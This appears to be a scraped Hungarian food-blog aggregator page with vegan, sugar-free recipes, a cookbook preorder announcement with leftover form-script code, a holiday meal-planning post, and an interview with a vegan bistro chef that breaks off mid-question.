Inzulinrezisztens, vegán, cukormentes Hozzávalók: 20 dkg teljes kiőrlésű búzaliszt 10 dkg zabpehelyliszt 4 dkg Diawellness 1:4 cukorhelyettesítő 2 ek cukormentes kakaópor 7 dkg kókuszzsír 1 dl kókusztejszín egy csipet só A hozzávalókat egy tálban elkeverjük, majd annyi vizet öntünk hozzá, hogy a...

Mit eszik a vegagyerek? szakácskönyv! :)

2017. április 20. Zizi kalandjai 

Mit eszik a vegagyerek? szakácskönyv! :) Téli álmából felébredni látszik a blogomon, vagy inkább téli álomba szenderül, ahogyan a mai időjárás viselkedett… egy fantasztikus hírt oszthatok meg veletek. A válasz arra, hogy miért aludt a blog egy ideig, az az, hogy írtam/­­írok egy újabb szakácskönyvet, amelyet már néhányan nagyon vártatok! Amikor a Vegán Reggeli megjelent többen jeleztétek, hogy nagyon örültök neki, megvettétek, csodaszép, de mikor írok már vegagyerekes szakácskönyvet. A válaszom erre, hogy MOST! A Vegán Reggeli után jött egy kis “lazítás”, majd belevetettem magam újra a recept tesztelésekbe. Főztem, ettünk, főztem, ettünk… tesztelték az ételeket az 1 éves és 3.5 éves családtagok, vagyis a vega gyerekek is. Azt hiszem mindegyik recept átment a teszten: “Anya, ezt berakhatod a könyvbe!” – jött a válasz. A Mit eszik a vega gyerek? a mindennapok gyakorlatából összegyűjtött több mint 60 bevált recept (egy részük már megjelent a blogon, de a receptek többsége teljesen új) ennek megfelelően kizárólag természetes növényi alapanyagok (zöldségek, gyümölcsök, gabonák és magvak) felhasználásával készül (vagyis nem tartalmaz semmilyen állati eredetű élelmiszert: tejterméket, tojást, mézet, halat és húst), így mind a vegetáriánus, mind a vegán étrend iránt elkötelezettek, mind pedig a növényi alapú ételek iránt csak érdeklődők számára is remek útmutatásként szolgál. Ezenkívül a könyvben szereplő több recept hasznos forrása a gluténmentes és a cukormentes táplálkozást követőknek, a feltüntetett allergének pedig segítenek azoknak, akiknek valamilyen táplálékallergiára is ügyelniük kell. Ez nem egy hozzátáplálási kézikönyv! A könyvben szereplő receptek 1 éves kortól 101 éves korig (vagy azon túl ) fogyaszthatóak, tehát egy teljes család számára biztosít könnyebb, egyszerűbb, gyorsabb és ráérősen készítős recepteket is, amelyek dietetikus által lettek ellenőrizve! A könyv öt fejezetre van bontva: reggeli, ebéd, vacsora, parti/­­desszert és alapreceptek. Az egyes fejezetekben lévő receptek jól kombinálhatók egymással. A reggelik édes ízvilágúak (turmixok, juice-ok, palacsinták, kásák), de ha valami sósra vágyunk, akkor a vacsora fejezet egyik kencéjét elkészítve máris van sós reggelink (meg inspirálódhatunk a Vegán Reggeli könyvből is). Az ebéd fejezet főtt ételek teljes sorát gyűjti csokorba. Nagyon sok a zöldséges gabonafasírt, a ragu, de van főzelék is. A vacsora részben is vannak meleg ételek, gyorsan elkészíthető levesek, tészták, de zöldség-hüvelyes kencék, valamint egy alap saláta is feltűnik. A parti/­­desszert rész többnyire édes dolgokat takar, de van benne egy-két sós finomság is – csakis olyanok, amelyek egy gyerekzsúron is megállják a helyüket és élvezettel fogják fogyasztani a gyerekek és a szüleik is. Az alapreceptek fejezet pedig olyan receptekből áll, amelyek alapok lehetnek a konyhánkban és többféle étel elkészítéséhez fel tudjuk őket használni, ilyen például a házi vegán parmezán, a kesudióvaj, a villámgyorsan elkészíthető ketchup, a szezámmagos (hamburger) zsemle vagy a kókuszjoghurt. Nagyon izgulok, mert a fotókat most én készítettem… remélem tetszeni fog nektek! Ezenkívül található a könyvben egy használati útmutató: bevásárláshoz, főzéshez, sütéshez ad tippeket, ötleteket. Írok a az egészséges táplálkozásról, hogy nekünk mi vált be, hogyan tudjuk rávenni a gyerekeket a spenót, a saláta vagy akár egy quinoa tabulé megevésére. A legbüszkébb pedig arra vagyok, hogy a Pécsi Tudományegyetem Egészségtudományi Kar Dietetikai és Táplálkozástudományi Intézete vállalta, hogy szakvéleményt (tudományos tényekkel alátámasztott bevezetőt) ír a könyvemhez! Hálás köszönetem Erdélyi Attila III. éves dietetikus hallgatónak, Szabó Zoltán szakoktatónak és Prof. Dr. Figler Mária egyetemi tanárnak, hogy vállalták ezt a nemes feladatot és alátámasztják a vegán táplálkozás fontosságát. A Mit eszik a vega gyerek? egy vegán szakácskönyv, amely bemutatja, hogy a növényi étrenden belül is létezik a gyermekek kitűnő egészségéhez vezető, teljes értékű vegyes táplálkozás. Külön köszönet a Boook Kiadónak, hogy láttak, látnak fantáziát a témában, a kiadó vezetőjének Széplaki Péternek, Földi Hajnal művészeti vezetőnek,  B. Tier Noémi szerkesztőnek, Lukács Eszter dietetikusnak. Ezer hála a kiadó többi kollégájának: Adrinak, Kingának, Matyinak, Csillagnak, Enikőnek, Bereznay Tamásnak, Tóth Milánnak és Erdőháti Áronnak a sok segítségért. A könyv nem jöhetett volna létre a családom (szüleim, öcsém), Iván és természetesen a vega gyerekek (Ádám és Ákos) támogatása nélkül! A Biorganik egy fantasztikus cég, akik elláttak alapanyagokkal és támogatják a könyv létrejöttét. A Monkie (SkipHop Magyarország) nagyon sok eszközt biztosított a fotózáshoz, a Planetbio az utolsó pillanatban a segítségünkre érkezett egy nagy tasak kakaóbabtörettel és persze ott vannak a konyha angyalai: Gacsó Anikó (Bébispenót), Szabó Jucus (5hozzávaló) és Kósa Gabi (Rakottkert), akik káprázatosan főztek, sütöttek és a kezem alá dolgoztak a könyv fotózásakor. Nélkületek nagyon nehéz lett volna, csajok! Hashtag, amit a könyvvel kapcsolatban használhattok a social media felületeken: #miteszikavegagyerekszakacskonyv. Speciális előrendelési akció keretében 2017. április 30-ig csak most csak nektek a könyv a weboldalamon 25%-os kedvezménnyel, 3367 Ft-os áron megrendelhető az alábbi linken! A könyv várható érkezése: 2017. május vége!  A sikeres megrendelésről pár percen belül emailben értesítek mindenkit, amelyben minden információ szerepelni fog a fizetés, a személyes átvétel és a szállítás módjáról. 2017. május 1-től pedig 20%-os kedvezménnyel (3592 Ft) lehet majd a könyvet előrendelni az adott linken! 25%-OS KEDVEZMÉNNYEL 4490 FT HELYETT 3367 FT! NAGY ZITA: MIT ESZIK A VEGA GYEREK? (Könyvrendelés!) Zizi új könyve 25%-os kedvezménnyel elérhető a zizikalandjai.com blogon! (Postázni csak magyarországi címre tudunk jelenleg!) Név* Vezetéknév Keresztnév Email cím* Email megadása Email megadása újból A véletlen elgépelés elkerülése céljából Számlacím* Számlán szereplő név /­­ cégnév Utca, házszám (emelet, ajtó) Város Irányítószám Személyes átvétel esetén is szükséges megadni, mert a jog így kívánja meg! Eltérő a postacímed?* NemIgen Postacím (számlacímtől eltérő) Utca, házszám (emelet, ajtó) Város Irányítószám Telefonszám (Futárnak szüksége lehet rá) KönyvHány darabot küldhetek 25% kedvezménnyel?* 1234567891011121314151617181920 Dedikálhatom a könyvet?NemIgen Hány darabot dedikálhatok?1234567891011121314151617181920 Ha többet rendelnél, mint 1 db, így könnyen meg tudod adni, hogy ebből hányat lássak el néhány kedves sorral, és hányat ne. Ha ajándéknak szánod a könyvet és szeretnéd, hogy a megajándékozandó személy részére dedikáljam a könyvet, akkor kérlek a megrendelést visszaigazoló e-mailre válaszolj, és írd meg, hogy kinek írhatom az ajánlást! Köszönöm! Kérlek válaszd ki a fizetés /­­ átvétel módját!* Utánvét, MPL futár (10.000 Ft-ot meghaladó értékű megrendelés esetén ingyenes!)Készpénz, személyes átvétel - INGYENES! (BOOOK Kiadó ügyfélszolgálatán, 1095 Budapest Mester utca 87.) Kérlek válaszd ki a fizetés /­­ átvétel módját!* Utánvét, MPL futár - INGYENES (10.000 Ft értékű megrendelés fölött)Készpénz, személyes átvétel - INGYENES! (BOOOK Kiadó ügyfélszolgálatán, 1095 Budapest Mester utca 87.) Fizetendő 0,00 Ft Email Ez a mező az érvényesítéshez van és üresen kell hagyni. if(typeof gf_­global == undefined) var gf_­global = {gf_­currency_­config:{name:Magyar Forint,symbol_­left:,symbol_­right:Ft,symbol_­padding: ,thousand_­separator:.,decimal_­separator:,,decimals:2},base_­url:http:/­­/­­www.zizikalandjai.com/­­wp-content/­­plugins/­­gravityforms,number_­formats:[],spinnerUrl:http:/­­/­­www.zizikalandjai.com/­­wp-content/­­plugins/­­gravityforms/­­images/­­spinner.gif};jQuery(document).bind(gform_­post_­render, function(event, formId, currentPage){if(formId == 4) {gf_­global[number_­formats][4] = {1:false,23:false,3:false,9:false,4:false,6:false,14:decimal_­comma,19:false,10:false,11:false,22:decimal_­dot,21:decimal_­dot,17:false,24:false};if(window[jQuery]){if(!window[gf_­form_­conditional_­logic])window[gf_­form_­conditional_­logic] = new Array();window[gf_­form_­conditional_­logic][4] = { logic: { 4: {field:{actionType:show,logicType:all,rules:[{fieldId:9,operator:is,value:Igen}]},nextButton:null,section:null},11: {field:{actionType:show,logicType:all,rules:[{fieldId:10,operator:is,value:Igen}]},nextButton:null,section:null},22: {field:{actionType:show,logicType:all,rules:[{fieldId:19,operator:,value:2}]},nextButton:null,section:null} }, dependents: { 4: [4],11: [11],22: [22],21: [21] }, animation: 0, defaults: {1:{1.2:,1.3:,1.4:,1.6:,1.8:},23:{23:,23.2:},3:{3.1:,3.2:,3.3:,3.4:,3.5:,3.6:},9:,4:{4.1:,4.2:,4.3:,4.4:,4.5:,4.6:},14:{14.1:,14.2:,14.3:},10:,11:1}, fields: {1:[],23:[],3:[],9:[4],4:[],6:[],14:[],19:[22,21],10:[11],11:[],22:[],21:[],17:[],24:[]} }; if(!window[gf_­number_­format])window[gf_­number_­format] = decimal_­comma;jQuery(document).ready(function(){gf_­apply_­rules(4, [4,11,22,21], true);jQuery(#gform_­wrapper_­4).show();jQuery(document).trigger(gform_­post_­conditional_­logic, [4, null, true]);} );} if(window[gformInitPriceFields]) jQuery(document).ready(function(){gformInitPriceFields();} );} } );jQuery(document).bind(gform_­post_­conditional_­logic, function(event, formId, fields, isInit){} ); jQuery(document).ready(function(){jQuery(document).trigger(gform_­post_­render, [4, 1]) } );

Málnás Brownie

2017. április 9. Fittanyuka 

Szeretem a brownie -t készíteni, mert a kedvelt bögrés süti modern változata, habár én most grammban adom meg a recept mennyiségeit. Bármilyen kedvenc friss vagy fagyasztott gyümölcsünkkel készíthetjük, vagy akár önmagában. A tömény étcsoki ízéhez illik a savanykás málna vagy más piros gyümölcs. Természetesen vegán és cukormentes, almasziruppal készül, amely segít abban, hogy a sütemény tésztája kissé “ragacsos” legyen. Hozzávalók:  240 g tönkölyliszt 120 g kakaópor 320 g 100%-os almaszirup 10 evőkanál kókuszolaj 150 ml mandulatej 1/­­2 tk sütőpor 100 g étcsokicsepp (süthető) Tetejére: 200 g 70%-os belga étcsokoládé 200 g málna A sütemény száraz összetevőit összekeverjük, majd hozzáadjuk a tejet és a szirupot, a folyékony kókuszolajat (kissé felmelegítjük ha ledermedt). Egy kiolajozott, kilisztezett szögletes, kb. 30X30 centiméteres sütőformába öntjük és előmelegített sütőben 200 C fokon sütjük 10 percig, majd további 15-20 percig 180 C fokon. A csokoládét vízgőz felett felolvasztjuk és a kihűlt sütemény tetején egyenletesen eloszlatjuk, rá szorjuk a málnát és hagyjuk kissé hűvös helyen megdermedni, majd tetszőleges nagyság kockákra vágjuk.  

Csokis kifli, teljes kiőrlésű lisztből, cukormentesen

2017. február 13. Vegavarázs 

Limara turbó csokis kiflijét dolgoztam át. Hozzávalók: 45 dkg teljes kiőrlésű tönkölyliszt 15 dkg fehér tönkölyliszt 2 dkg friss élesztő 2,5 dkg Diawellness 1:4 cukor egy csipet só 1 dl tejszín kb 1,5 dl langyos víz A töltelékhez: 10 dkg 85 %-os étcsokoládé 2 ek kakaópor (cukormentes) fél kk őrölt...

Teljes kiőrlésű zabos-mogyoróvajas keksz

2017. január 5. Vegavarázs 

Hozzávalók: 20 dkg teljes kiőrlésű királybúza liszt 10 dkg apró szemű zabpehely 10 dkg vaj 15 dkg mogyoróvaj (cukormentes) 15 dkg nyírfacukor (vagy 5 dkg Diawellness negyedannyi cukor) 2-3 ek kakaópor (cukormentes) 1 kk szódabikarbóna 1/­­2-1 dl víz Egy ideje búzából őrlöm a lisztet, tehát először...

Csupa aszalványos granola

2017. január 4. Éltető ételek 

Csupa aszalványos granolaImádom az aszalt szilvát, így ebből a granolából sem maradhatott ki. Az a jó ebben a finomságban, hogy egyszerre akár dupla adagot is elkészíthetsz, így a reggeli hip-hop elkészül. Hiszen csak gyümölcsöt kell darabolnod, és egy kis (növényi) tejet kell ráöntened.  Ha extra ropogósságra vágyunk, akkor a kása tetejét is megszórhatjuk vele, de egy chiamagos puding is jó barátságban van vele. Hozzávalók: - 25 dkg nagyszemű zabpehely - 15 dkg olajos mag (amit éppen szeretsz, kerülhet bele dió, mandula, kesudió, szezámmag vagy éppen pisztácia is) - 5 dkg aszalt szilva - 5 dkg aszalt barack - 5 dkg mazsola - 1 evőkanál kókuszolaj - 1/­­3 mokkáskanál vaníliapor - 1/­­3 mokkáskanál fahéj - 6-8 csepp narancsolaj Elkészítése: - A kén- és cukormentes aszalványokat vágd fel kis darabokra, és önts rá annyi vizet, amennyi éppen ellepi. Hagyd állni kb. 1 órát. - Az olajos magvakat vágd fel kis darabokra, vagy jól törd össze. - A megpuhult aszalványt botmixerezd. - Minden hozzávalót alaposan keverd össze. - Ezt a finom müzlit (így magában is nagyon finom) tedd egy zsírpapírral bélelt tepsibe. Előmelegített sütőben, 160 fokon pirítsd mintegy 20-30 percig. Időközben néhányszor keverd át. - Hagyd kihűlni, jó ropogós lesz. Zárható üvegbe tárold, hogy ne kapjon nedvességet.Jó étvágyat!

Tudatos felkészülés a karácsonyra - 8. rész Az étkezés

2016. december 6. Élj harmóniában 

Tudatos felkészülés a karácsonyra  - 8. rész Az étkezés Ne engedd, hogy a karácsonyi készülődés feleméssze minden energiádat és pénzedet A karácsonyi ünnepek idején sok családban az étkezés központi helyet foglal el - vannak olyan családok is, ahol szinte másról sem szól a szeretet ünnepe, mint az evésről. Megannyi statisztika támasztja alá, hogy az ünnepi időszak alatt az emberek jelentős része a normál - általában elfogyasztott -  mennyiségű élelmiszer többszörösét vásárolja meg, készíti el és fogyasztja el. Majd az ünnepi hangulat helyett, sokaknak okoz a nagy mennyiségben elfogyasztott mindenféle egészségtelen étel, nehéz emésztést,  emésztési problémákat, mindenféle fájdalmakat, elnehezültséget. tunyaságot. Az emésztési problémák miatt a gyengülő immunrendszer következtében az ünnepek  után sokan megbetegszenek, mert már az első kórokozó is betegsége t vált ki belőlük.  Sajnos a tudatos táplálkozás hiánya  miatt a karácsonyi időszakban hatalmas mennyiségben fogynak a patikákban a különböző emésztést segítő gyógyszerek, tabletták, készítmények. Nem kell, hogy a karácsonyod az emésztési kínokról szóljon. Kis odafigyeléssel, tudatossággal elérheted, hogy az ünnepek alatt friss, ízletes, tápláló ételeket egyél Te és a családod is és az étkezés után energikusnak, könnyednek érezzétek magatokat.   Ahhoz, hogy a pénzedet és az energiádat se pazarold és kiváló legyen a közérzeted, tervezd meg előre a karácsonyi időszak menüit - mindenből csak annyi főre tervezz, ahányan lesztek. Azért mert karácsony van, senkinek nem kell és nem is érdemes három ember helyett ennie.  A menü összeállításánál törekedj inkább arra, hogy friss, egészséges legyen és arra, hogy ne vállald túl magad a konyhai feladatokkal.  Nem érdemes túl bonyolult ételeket készíteni, hasznosabb ha több időt töltesz a családoddal és egyszerű, gyorsan elkészíthető, friss egészséges, ízletes ételeket választasz a karácsonyi menühöz. Itt is vedd figyelembe a kevesebb néha több elvet. Inkább a minőségi ételeken legyen a hangsúly, mint a mennyiségen. Inkább a friss,  egyszerű és egészséges ételeket preferáld, mint a bonyolult, egészségre kevésbé kedvező ételeket.   A karácsonyi menüt friss, egészséges, vegyszermentes (bio) alapanyagokból készítsd el és annyit ételt főzz, amennyit jólesően el is fogyaszt a család. A karácsony lényege a hangulat, az hogy a családoddal harmonikusan, szeretetben tudj közösen időt tölteni. Amennyiben a szeretet és harmónia elmarad, azt semmilyen étellel nem lehet pótolni. nem érdemes a karácsonyi menü miatt elégedetlenkedni, veszekedni. A megtervezett menühöz írd össze az alapanyagokat és ha teheted, interneten keresztül rendeld meg, így elkerülheted a boltokban és az utcákon, bevásárlóközpontokban való tolongást és több szabadidőd is marad, amit együtt tudtok tölteni a családoddal.   Törekedj a mértéktartó étkezésre és a friss, minőségi ételek fogyasztására, hogy jól indulhasson a következő éved:) Néhány javaslat a blogról a karácsonyi menühöz - a linkre kattintva eléred a receptet. A receptek nem tartalmaznak húst, halat, tojást, azaz alapvetően laktovegetáriánus receptek, de sok van köztük ami laktózmentes, gluténmentes ételek. Nézelődj kedvedre:)   Édes sütemények, kekszek Citromos vaníliás keksz Reform csokis keksz Egyszerű kókuszos zabpelyhes keksz  Karácsonyi keksz teljes kiőrlésű  liszttel Házi készítésű cukormentes csokoládé Teljes kiőrlésű tönkölykeksz naranccsal és mandulával Narancsos mazsolás keksz Gluténmentes, laktózmentes, cukormentes vaníliás keksz Zablisztes almás-diós muffin Gluténmentes, tejmentes, cukormentes köles desszert Házi készítésű mogyorós csokoládé  Egyszerű, sült túrótorta Kókuszos, kakaós tönkölysütemény Reform almás szamósza Tejmentes sütőtökös muffin Gluténmentes muffin Teljes kiőrlésű, tojásmentes linzer Reform almás pite tönkölybúzaliszttel Tejmentes, tojásmentes mandulás muffin  Gluténmentes, cukormentes, tejmentes meggyes muffin Shortbread keksz - reform változat   Bögrés mákos sütemény Gluténmentes bögrés süti     Sós vendégvárók Egyszerű sós stangli Élesztőmentes, gyors túrós vendégváró  Gyors, élesztőmentes tejfölös pogácsa  Gluténmentes sós muffin  Cukkinis, pirított napraforgómagos minikifli Gyors hummuszkrém Élesztőmentes cukkinis pogácsa       Ebéd vagy vacsora ételek Indiai Dhal - mungbab leves Quinoa, brokkolis zöldségekkel Sült padlizsános, sült házi sajtos főétel Káposztás subji - ízletes fűszeres káposztás étel  Vegyes zöldséges subji - zöldséges főétel Cukkini-burgonya curry Hummusz  Sütőtökös subji  Zöldséges, csicseriborsós kuszkusz Kitri (kichari)  Vöröslencsés, zöldséges lasagne Gluténmentes zöldségfasírt Polenta krémesen, párolt zöldségekkel  Gluténmentes zöldséges lepény Zöldséges polenta pizza Fűszeres vöröslencse dhal, aszalt paradicsomos, sajtkrémes muffinnal Sütőben sült köles kása Sütőben sült fűszeres karfiol  Céklás zöldségek hajdinával Gyors, egyszerű csicseriborsós curry  Zöldséges pizza Pudla, gluténmentes indiai lepény   Baszmati rizs zöldségekkel, korianderrel Feketemustármagos zöldbab paradicsomszószban Fűszeres sült, sütőtök  Édesköményes lepény Mindenféle finomságok Chapati - indiai lepénykenyér Gyömbér tea  Alma csatni Szilva csatni (sós, édes,csípő finomság) Quacamole  Uborka raita  Reggeli mandulaturmix Datolyás tejturmix  Krémes zabkása dióval és mazsolával Pirított, párolt gyümölcsök - ájurvédikus reggeli  Házi joghurt készítése Gyors, élesztőmentes kenyér Jó étvágyat kívánok:) szeretettel: Kati

Ribizlis “joghurt” zselé

2016. július 18. Fittanyuka 

Ribizlis “joghurt” zselé Nagyon régóta nem fogyasztok tejterméket, közel tíz éve egyáltalán nem és nem is hiányzik. Anno a tejtermékek közül a kedvencem a joghurt volt, akár gyümölcsösen is, habár ma már tudom, hogy a tejtermékeket gyümölccsel társítani nem szerencsés, mert összeerjednek a bélrendszerben. Ennél a desszertnél nem kell ettől tartani és mégis emlékeztet a gyümölcsös joghurtra, ugyanis a növényi tejeket, tejszíneket bátran társíthatjuk a gyümölcsökkel. Gyorsan elkészül és bármilyen gyümölccsel készíthetjük. Vegán,-glutén és cukormentes desszert. Hozzávalók: 2 főre 200 ml kókusztejszín 100 g ribizli 1 dl víz 0,5 evőkanál eritrit vagy ízlés szerint 1 teáskanál agar – agar ( növényi zselésítő) - A vizet az agar-agarral feltesszük főni. Nem forraljuk, csak melegítjük, amíg a por fel nem oldódik és forráspont alá kerül. Hozzáadjuk az eritritet és a ribizli felét. - A többi ribizlit megtisztítjuk és a tálaló tálunkba, poharunkba tesszük. - A kókusztejszínt hozzákeverjük a ribizlis “zseléhez”, felforraljuk és utána a tálaló poharakba öntjük, hagyjuk hűlni szobahőmérsékleten, majd a hűtőben jól behűtjük.  

Nyári frissítő egészségesen

2016. június 18. Éltető ételek 

Nyári frissítő egészségesenEbben a nagy melegben jól esik a hűsítő ital, a gyerekek nagy örömére. A végén még a gyümölcsöket is kikanalazták. Hozzávalók: - 1 liter almalé (lehetőleg frissen préselt, vagy 100%-os, cukormentes) - 1 liter tisztított víz  - 3-4 marék friss gyümölcs szezonálisan (én most epret, almát, narancsot és cseresznyét tettem bele)  - 1 kis marék aszalvány (ne legyen kénkezelt!)  - bio citrom  - néhány friss levél menta és citromfű  - fahéj, vanília, egész szegfűszeg Elkészítése: - A gyümölcsöket tisztítsuk meg, és kockázzuk fel kis darabokra.  - A folyadékot tegyük egy kancsóba, majd adjuk hozzá a gyümölcsöket és a leveleket.  - Ízesítsük még citromkarikákkal (ezt jól nyomkodjuk meg), fahéjjal és vaníliával.  - Hagyjuk a hűtőben állni pár óráig. Tegyünk bele néhány jégkockát.

Interjú az Elixires Soós Ádámmal, a vegán ispánnal

2016. június 6. Vegán lettem 

Interjú az Elixires Soós Ádámmal, a vegán ispánnalSoós Ádám a vegán Elixir bisztró séfje, hardcore punk szkrímer és Bianchista meséli el melyik vegán étel lenne legszívesebben.   Mesélj röviden magadról annak aki nem ismerne. Ádám vagyok, egy vidéki hardcore/­­punk srác. Amikor hat éve felköltöztem Pestre, már vegán voltam és nagy álmom volt, hogy vegán szakács, valamint bicajos futár legyek, noha enyhe túlzással élve nem tudtam főzni és ennek tetejébe a várost sem ismertem. Mindezek ellenére több helyen dolgoztam szakácsként majd konyhafőnökként és futárként is, és már saját kis vegán bisztróm van, az Elixir.   Miért pont ispán és honnan jött a név? A vegan ispán vagy helytartó “gúnynév” először egy poénnak indult, mert hajlamos vagyok ,,túlságosan komolyan venni a veganságot és ehhez hasonló viccelődéssel próbáltuk feloldani azt, ahogy arra reagáltam, hogy elég sokan még egy vegánnak nevezett csoportban sem értik meg valamiért sajnos, hogy a vegánság az állatokról szól, nem pedig rólunk. Nem fér bele egy kicsi ez vagy az. Azt már szinte csak zárójelesen jegyzem meg, hogy az ispánság fogalmába nálam beletartozik az is, hogy maximálisan segítőkész vagyok és segítek, ahol tudok.   Mi a véleményed a magyar vegán viszonyokról és tévhitekről a téma kapcsán? A honi viszonyokról nagyon vegyes érzelmeim vannak. Egyrészt az elmúlt években összesen egy vegan kollégám, felettesem volt az összes vegetáriánus, vegán helyet figyelembe véve. Ez is közrejátszott abban hogy megalapítottam az Elixírt, ahol valóban csak vegánok dolgoznak. De nagyon örülök, hogy egyre többeket érdekel a vegánság itthon, elindult valami hatalmas robbanás, ami köszönhető többek között Kristóf barátom személyének és könyvének is, viszont az kifejezetten zavar mind a mai napig, amikor anyagi megfontolásból ugranak fel a vonatra olyanok, akiknek húsos helyük is van például. Számomra a vegánság nem egy financiális luxusexpressz, amire fel lehet pattanni. Hanem a törődés, a szeretet egyik legszebb módja, a jogi, környezettudatos mozgalmak egyik legfontosabbika és a hitelességnek ebben alapvető értéknek kellene lennie. Ugyanis ez egy rémesen egyszerű dolog és teljesen érthetően van definiálva: nem használunk állatokat! Ha pedig nem használsz állatokat, nem élsz például a halálukból. Ezen logika alapján sem tudom elfogadni azt sem, amikor valaki vegán szakácsnak hívja magát bőrcipőben, mézzel és a többi. A forradalom a tányérodon kezdődik, de nem ott kell véget érnie. Legyünk mindannyian következetesek, próbáljuk meg minimalizálni az ártást és tegyünk meg mindannyian, akár közösen a lehető legtöbbet azért, hogy majd a következő nemzedékek is egy valamennyire használható sárgolyóbist vegyenek át. Valószínűleg bennem túlságosan intenzív egy vegán társadalom iránti vágy – ezért is tűnhetek szigotúnak – és valahol nagyon remélem, hogy pár évtized múlva már a múlté lesz az állathasználat. Ettől függetlenül én minden apró dolognak örülök, a vegetáriánusokat is simán támogatom, hátha egyszer vegánok lesznek ők is, hisz addig is kevesebb állat szenved.     Kicsit mesélj az Elixirről. Mostanában költöztetted, de mik a távoli terveid a bisztróval? Nos, ez egy etikai – sajnos tartunk ott, hogy ezt a jelzőt hozzá kell tenni – vegán testvériség bisztrója, ami már full-time étterem lett. Próbálok rendkívül demokratikus módszerekkel irányítani, a barátság nagyon fontos alapja a cégnek és a kevés szabadidőnket is együtt töltjük Petivel és Lacival. Gasztronómiai szempontból a legsarkalatosabb pont, hogy az ételeink gluténmentes vegán ételek, amelyek nélkülöznek mindenféle mesterséges kóficot és frissen készülnek korán reggel. De például a hamburger zsömléjét leszámítva minden cukormentes is, olajat is csak a hamburger pogácsája lát és még az az olaj is kókuszból van. Próbáljuk minimalizálni a szemetet, minél környezettudatosabbak lenni, hóviharban is bicajon visszük ki az ebédet lebomló dobozban. Azért télen a bringán néha rezgett a léc rendesen, most pedig jön a következő nehézség, a betonforró 40-45 fok. De egy vegán előtt nem létezik lehetetlen. Az Elixir másik talppontja a közösségi konyha modellje. Sok étteremnél láttam azt kiírva, elmondva, hogy mennyire fontosak a vevők, csak ebből éppen érezni nem lehetett sokat. Mivel már untatott az ipari mennyiségű étkek gyártása napi 500+ adagos konyhafőnökként, arra vágytam, hogy több embert megismerhessek, és akár beszélgethessek velük egy ebéd mellett. Így fogtam magam, felmondtam és megalapítottam a saját helyem, ahol valóban fontos mindenki, ezért is vannak közösségi események, például önköltséges bográcsos parti – ahol legutóbb 150 ember számára készítettem vacsorát a Városligetben. Emellett főztem rászorulóknak, szokott lenni közös bicajozás és ott van az “Elixir menni random valakihez” program. Nagyon fontos számomra, hogy figyelem és törődés is társuljon ehhez az egészhez. Engem rendkívül motivál az Elixires közönség, akikékert ezt az egészet teszem. Ha nem így lenne, akkor már rég bezártam volna és elköltöztem volna az országból. Megszámlálhatatlanul sok kedves embert ismertem meg, több megrendelőnk azóta haverom, némelyik mondhatni barátom lett és sosem éreztem jobban a munkám, mint most az Auróra közösségi házban, ahova nemrégiben költözött a bisztró. De nem mulasztok el egyetlen alkalmat sem az állati jogokról, valamint az egészséges táplálkozás előnyeiről beszélni és valahogy a legtöbben fogékonyak ezekre. Szóval számomra az az abszolút cél, hogy egy nagyobb közösség alakuljon ki a vegánság alapelvein támaszkodva és minél több jó élményünk legyen együtt. Ez az Elixir.   “Elixir menni random valakihez” – mesélj erről a projectről kicsit. Nem olyan régen jelentettem be az elsőt. A lényege az, hogy a projectnek dedikált facebookos eseménynál kell jelölni, hogy “jössz”. A csavar az egészben az, hogy nem jössz te sehova, hanem én megyek hozzád. Egy random generator program segítségével kisorsolok az attendelők közül egy nyertest, akihez elbicajozok, majd együtt sütünk-főzünk valamit abból, amit találunk a lakásban. Pár barátom azzal viccelődött, hogy már az első alkalommal egy szép lányhoz mentem és meg van bundázva az egész, de ez aljas rágalom. Az érdeklődők jelölnek, a program sorsol. “HALLOD, VIKTOR? ALJAS RÁGALOM.”   Ha valaki bemenne az Elixirbe és azt kérdezné melyik általad kreált étel mutatja be legjobban szavak nélkül azt aki vagy, melyik ételt tennéd elé? Most feladtad a leckét. Talán egy intenzív, színes, valószínűleg thai zöldségragu lenne bőven megszórva zöldekkel, mogyoróval, csírával, barna rizzsel. Mivel naponta változik a menü és tizenfajta finomságot csinálok sokszor ad hoc jelleggel, így nehéz választani, de most, ebben a pillanatban ez jutott eszembe.   Mióta növeszted a hajad és milyen hosszúság a cél? Erre a kérdésre nem számítottam, Gyuri. Itt nevetek a gép mögött. Igazából nem is növesztem, egyszerűen csak nem jutottam el egy ideje fodrászhoz. A nagy meleg miatt gondolkodom rajta, hogy sokkal rövidebb legyen, mert egyrészről utálok a konyhában sapkában dolgozni meg azt se szeretem, ha fel kell kötnöm a hajam. Szóval fogalmam sincs, mit fogok csinálni a fejemmel, viszont amikor legutóbb változtattam az arcberendezésemen – elhagytam a bajszom -, az némi túlzással közfelháborodást váltott ki, szóval meg kell gondolni minden lépésemet, nehogy elsodorjon a népharag.     Vegán séf és zenész is vagy. Mesélj a zenekarodról. Hogy van időd még zenélni is? Most jött ki az új albumutok. Definiáld a stílusát. Néha magam sem tudom, hogy tudok ennyi mindenre időt szakítani, de úgy vagyok vele, ha valamit meg akarsz csinálni, azt nagy eséllyel meg is fogod. A zenekarom neve Libido Wins és atmoszférikus post-hardcore/­­screamo stílus lenne az a fura katyvasz, ha mindenképpen definiálnom kell. Nagyon depresszív, költői, néhol nagyon zajos, de hipermelodikus, tele van fura váltásokkal és sok helyen nyúlunk zongorához is. Van benne rengeteg punk, indie, emo, post-rock hatás is, de volt, ahol freejazz-t kevertünk bele. A már készülő, talán még idén megjelenő EP-n pedig lesz némi country és latin íz is itt-ott spoken word-del fűszerezve. Egyébként tizenéves barátság az alapja a bandának, voltunk turnézni többször más országokban is, kiadták a dolgainkat, játszottunk hajón, próbateremben, foglalt házban, nappaliban, gördeszkapályán, pincében, nagy klubban és kicsiben is. Volt pár év szünet most, majd hirtelen visszatértünk egy nagylemezzel, amely hatalmasat tarolt eddig. Stílusában globális szinten a Bandcamp oldalon top 3-ban volt, itthon is rengeteg pozitív visszajelzés érkezett. Nekem ez a fura kis banda életem szerelme a bicajozáson kívül. Alig várom, hogy ismét mehessünk turnézni, már nyárra és őszre le van kötve pár dátum, plusz 2017-re is szervezünk ezt-azt. Nehéz megoldani a próbákat, mert Laci, a gitárosunk - aki egyébként egy klasszikus vájtfülű, kissé elvesztegetett tehetség, bármilyen hangszerhez nyúl, ahhoz ért - három műszakban dolgozik vidéken, de örömünket leljük abban, hogy együtt lehetünk, akkor pedig pláne, ha mondjuk máshol szétzajonghatjuk az emberek lelkét.   Bianchi. Mit jelent ez a szó neked? Precizitást, minőséget, sebességet, esztétikát, szabadságot.   Kérlek, foglald össze 1 mondatban a 